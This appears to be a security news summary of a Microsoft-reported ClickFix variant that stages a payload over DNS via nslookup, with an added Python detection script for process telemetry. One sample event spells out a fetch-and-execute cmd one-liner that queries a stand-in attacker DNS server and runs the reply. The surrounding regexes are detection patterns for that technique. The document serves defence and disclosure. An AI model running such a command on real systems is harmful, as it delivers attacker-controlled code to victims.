Microsoft Warns of Evolving ClickFix Malware Leveraging DNS Lookups
- 3 days ago
Key Findings
Microsoft warns of a new ClickFix variant that tricks users into running a malicious nslookup command through the Windows Run dialog to retrieve a second-stage payload via DNS.
The pasted command uses cmd.exe to run nslookup against a hard-coded external DNS server, bypassing the system's configured resolver; the `Name:` field of the response is extracted and executed as the second-stage payload.
Staging over DNS lets the attackers deliver the payload from infrastructure they control without an HTTP request at the first stage, and the lookup blends into the constant DNS traffic every host generates, which is rarely inspected as closely as web traffic.
The payload downloads a ZIP from an external server, extracts a Python script to conduct reconnaissance, and drops a VBScript that launches ModeloRAT, a Python-based RAT.
Persistence is achieved with a Windows shortcut (.lnk) placed in the Startup folder, so the malware is launched at every logon.
Background
ClickFix is a social engineering technique that has evolved into multiple variants over the past two years. It typically uses a fake CAPTCHA or error message to talk victims into copying and running a command on their own machine; because the user, not an exploit or a downloaded file, launches the command, the technique sidesteps many of the controls that watch for malicious downloads.
DNS-Based Staging
In the latest ClickFix variant, the command pasted into the Run dialog uses cmd.exe to run nslookup against a hard-coded external DNS server rather than the system's default resolver. The `Name:` field of the DNS response is extracted and executed as the second-stage payload.
Using DNS as the staging channel lets the attackers reach infrastructure they control without a web request at the first stage, and the query is easy to miss among the DNS traffic every host generates. It also gives them a validation step: the second stage runs only if the attacker-controlled server answers with the expected response, so sandboxes and analysts that cannot reach that server see nothing beyond a failed lookup.
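The pattern described above is easy to hunt for in process-creation telemetry (Sysmon Event ID 1 or Windows 4688 command lines): a command interpreter running nslookup with an explicit second positional argument (the hard-coded server) while also parsing the `Name:` field of the output. The script below is an added example, not code from Microsoft or the cited articles. The sample command lines are constructed; the exact token layout of the real lure (a `for /f` loop over `nslookup ... | findstr Name:`) is an assumption about how such a one-liner would be built in cmd, and the documentation ranges 203.0.113.0/24 and 198.51.100.0/24 stand in for attacker IPs. The internal DNS suffix `.corp.example` is likewise a placeholder.

```python
"""Heuristic triage of process-creation command lines for the DNS-staged
ClickFix pattern: cmd.exe runs nslookup against a hard-coded server,
extracts the ``Name:`` field of the reply, and executes it.

Added example, not code from Microsoft or the cited articles. Sample
command lines are constructed; the for /f + findstr layout is an
assumption about how the lure would be written, not taken from the page.
"""
import ipaddress
import re

# "nslookup [-opt ...] <query> <server>": a second positional argument
# means the lookup bypasses the system's configured resolver.
NSLOOKUP_RE = re.compile(
    r"\bnslookup(?:\.exe)?\s+(?:-[\w=:.]+\s+)*([\w.\-]+)\s+([\w.\-]+)",
    re.IGNORECASE,
)
NAME_FIELD_RE = re.compile(r"\bName:", re.IGNORECASE)
# cmd's "for /f ... do <token>" is the idiomatic way to execute parsed output.
FOR_F_EXEC_RE = re.compile(r"\bfor\s+/f\b.*?\bdo\s+\S", re.IGNORECASE | re.DOTALL)

# RFC 1918, loopback and link-local ranges count as internal. Documentation
# ranges (used below for the attacker) are deliberately NOT in this list.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]
INTERNAL_DNS_SUFFIXES = (".corp.example",)  # constructed placeholder suffix

def is_internal_server(server):
    """True for internal IPs or hostnames under an internal DNS suffix."""
    try:
        addr = ipaddress.ip_address(server)
    except ValueError:
        return server.lower().endswith(INTERNAL_DNS_SUFFIXES)
    return any(addr in net for net in INTERNAL_NETS)

def analyze(cmdline):
    """Return the individual indicators and an overall verdict for one command line."""
    m = NSLOOKUP_RE.search(cmdline)
    server = m.group(2) if m else None
    external = server is not None and not is_internal_server(server)
    parses_name = bool(NAME_FIELD_RE.search(cmdline))
    executes = bool(FOR_F_EXEC_RE.search(cmdline))
    if external and parses_name and executes:
        verdict = "high"      # lookup to external server, Name: parsed, result executed
    elif external and parses_name:
        verdict = "medium"    # Name: parsed but no visible execution construct
    elif external:
        verdict = "low"       # admins do query 8.8.8.8 by hand; keep as context only
    else:
        verdict = "none"
    return {"server": server, "external_server": external,
            "parses_name_field": parses_name, "executes_output": executes,
            "verdict": verdict}

def triage(events):
    """events: iterable of (event_id, image, command_line).
    Returns (event_id, verdict) for every event whose verdict is not 'none'."""
    hits = []
    for event_id, image, cmdline in events:
        # Only command interpreters matter; a bare nslookup.exe process
        # carries no Name: parsing or execution in its own command line.
        if not image.lower().endswith(("cmd.exe", "powershell.exe")):
            continue
        verdict = analyze(cmdline)["verdict"]
        if verdict != "none":
            hits.append((event_id, verdict))
    return hits

# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    (1, r"C:\Windows\System32\cmd.exe",
     'cmd.exe /c for /f "tokens=2" %a in (\'nslookup 203.0.113.7 198.51.100.53 ^| findstr Name:\') do %a'),
    (2, r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c nslookup intranet.corp.example"),
    (3, r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c nslookup -type=MX example.com 8.8.8.8"),
    (4, r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c nslookup 10.0.0.5 10.0.0.53 | findstr Name:"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Only event 1 reaches "high": it names an external server, greps the `Name:` line and feeds the token back to cmd. Event 3 is the common admin case of querying a public resolver by hand and is kept at "low" so it can be used as context rather than an alert; events 2 and 4 stay on the default or an internal resolver and are ignored.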
Payload Analysis
Once the second stage runs, it downloads a ZIP archive, extracts a portable Python bundle together with the malicious Python code, and runs a Python script that performs host and domain reconnaissance and discovery commands. Shipping a portable Python runtime means the victim does not need Python installed, which is what makes a Python-based implant viable on an ordinary Windows host.
Finally, the attack drops a VBScript that launches ModeloRAT, a Python-based remote access trojan, and places a Windows shortcut in the Startup folder so the RAT is relaunched at every logon.
Conclusion
Microsoft describes the variant as using DNS as a "lightweight staging or signaling channel": the lookup lets the attackers reach their own infrastructure and insert a validation step before the second-stage payload runs, while avoiding the web requests that defenders more commonly inspect. The payload itself is still fetched over the network, so the DNS stage changes where the first hop is visible, not whether it is visible.
Sources
https://securityaffairs.com/188039/hacking/microsoft-alerts-on-dns-based-clickfix-variant-delivering-malware-via-nslookup.html
https://www.facebook.com/thehackernews/posts/%EF%B8%8F-microsoft-detailed-a-new-clickfix-variant-abusing-dns-lookups-via-nslookup-to-/1295865229244724/
https://radar.offseq.com/threat/microsoft-discloses-dns-based-clickfix-attack-usin-fbef1593
https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html